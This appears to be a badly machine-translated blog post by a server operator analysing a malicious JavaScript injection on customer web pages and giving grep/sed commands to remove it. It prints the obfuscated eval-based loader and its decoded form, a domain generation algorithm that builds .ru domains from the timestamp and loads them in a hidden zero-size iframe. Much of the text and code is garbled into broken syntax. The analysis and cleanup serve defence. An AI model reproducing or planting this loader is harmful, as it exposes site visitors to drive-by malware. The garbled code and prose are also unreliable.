High-end black chain SEO-malicious JS Script Injection for access to pseudo-random Domain Names (analysis and solution)

Our server has another intrusion accident. Some customers have inserted a Javascript script at the bottom of their html webpage. As a result, when a visitor opens the webpage, the antivirus software warns the website of malicious code. This is a common method in black chain SEO, But the strange thing is that the code we captured this time will generate a (pseudo) random domain name based on the current timestamp, and then access it regularly. It seems that the goal is not SEO.I. Attack AnalysisThe inserted javascript is here -- <script lang = "javascript">/* km0ae9gr6m */s = ""; try {q = document. createElement ("p"); q. appendChild ("123" + n);} catch (qw) {h =-016/7; try {a = prototype;} catch (zxc) {e = window ["e" + "va" + "l"]; n = "Uniform Invalid. Invalid. Invalid. Invalid. Bytes. Timeout. Timeout Bytes Bytes Bytes Bytes. Timeout Bytes Bytes. Timeout. Timeout Please ". split (". "Please refer if(please refer Doc ument) for (I = 6-2-1-2-1;-1828 + I! = 2-2; I ++) {k = I; s = s + String. fromCharCode (n [k]/(I % (h * h) + 2);} console. log (s) ;}}/* qhk6sa6g1c */</script> I don't know what to do when I get this code. I have to speak out here, why does our O & M not understand the code ...... I put it in Chrome and decode it like this: functionnextRandomNumber () {varhi = this. seed/this. q; varlo = this. seed % this. q; vartest = this. A * lo-this.R * hi; if (test> 0) {this. seed = test;} else {this. seed = test + this. m;} return (this. seed * this. oneOverM);} functionRandomNumberGenerator (unix) {vard = newDate (unix * 1000); vars = d. getHours ()> 12? 1:0; this. seed = 2345678901 + (d. getMonth () * 0 xFFFFFF) + (d. getDate () * 0 xFFFF) + (Math. round (s * 0 xFFF); this. A = 48271; this. M = 2147483647; this. Q = this. m/this. a; this. R = this. M % this. a; this. oneOverM = 1.0/this. m; this. next = nextRandomNumber; returnthis;} functioncreateRandomNumber (r, Min, Max) {returnMath. round (Max-Min) * r. next () + Min);} functiongeneratePseudoRandomString (unix, length, zone) {varrand = newRandomNumberGenerator (unix ); Varletters = ['A', 'B', 'C', 'D', 'E', 'F', 'G', 'h ', 'I', 'J', 'k', 'l', 'M', 'n', 'O', 'P', 'Q', 'R ', 'S ', 't', 'U', 'V', 'w', 'x', 'y', 'z']; varstr = ''; for (vari = 0; I <length; I ++) {str + = letters [createRandomNumber (rand, 0, letters. length-1)];} returnstr + '. '+ zone;} setTimeout (function () {try {if (typeofiframeWasCreated = "undefined") {iframeWasCreated = true; varunix = Math. round (+ newDate ()/1000); vardomainName = generatePseudoRandomString (un Ix, 16, 'ru '); ifrm = document. createElement ("IFRAME"); ifrm. setAttribute ("src", "http: //" + domainName + "/runforestrun? Sid = cx "); ifrm. style. width = "0px"; ifrm. style. height = "0px"; ifrm. style. visibility = "hidden"; document. body. appendChild (ifrm) ;}} catch (e) {}}, 500); it is interesting to know that it has a built-in random domain name generation function. Based on the unix timestamp, the pseudo-random number generator is a "pseudo" random because it is not a real random. We can calculate the result based on time. In fact, it generates a domain name like ctonxidjqijsnzny.ru znycugibimtvplve.ru every 12 hours. This is not a new hacker. Previously, some security personnel analyzed the download of malware. The attacker even used twitter messages as seeds to generate domain names. This was truly random and unpredictable, there is no way to issue warnings or block them. In other words, before this code starts to operate and generate access traffic, hackers have enough time to register and configure domain names and mount Trojan links. Without a doubt, if 2012 is not the end of the world, we can easily predict what domain name it will generate. So I checked the write-in program. In the next August 7, 2012, 89 domain names were registered, and WHOIS showed that the DNS resolution server was in Russia. The real hacker power is well known. After searching on the Internet, many foreign service providers also encountered this problem. Some people even observed some server logic, such as the 302 redirection mechanism based on the visitor's IP address.Ii. Security VulnerabilitiesMore importantly, how is malicious js code injected into our customers' webpages? By viewing the logs, we found that the hacker was a file upload vulnerability in a famous background management system. The vendor has provided a solution to fix the vulnerability. They suggest resetting the passwords of all users ......3. Wipe your assThis is my task. It took an hour to write two sentences and the test passed. # Checkgrep-rl-include = *. {php, js, htm, html} "km0ae9gr6m"/var/www/vhosts/*> injeted_list.txt # clean upgrep-rl-include = *. {php, js, htm, html} "km0ae9gr6m"/var/www/vhosts/* | xargssed-I-e's/\ * km0ae9gr6m/\ n &/G'-e's/qhk6sa6g1c \ // & \ n/G'-E'/km0ae9gr6m */, /qhk6sa6g1c/d'Reference link:Http://research.zscaler.com/2012/07/mass-compromise-includes-computerworld.html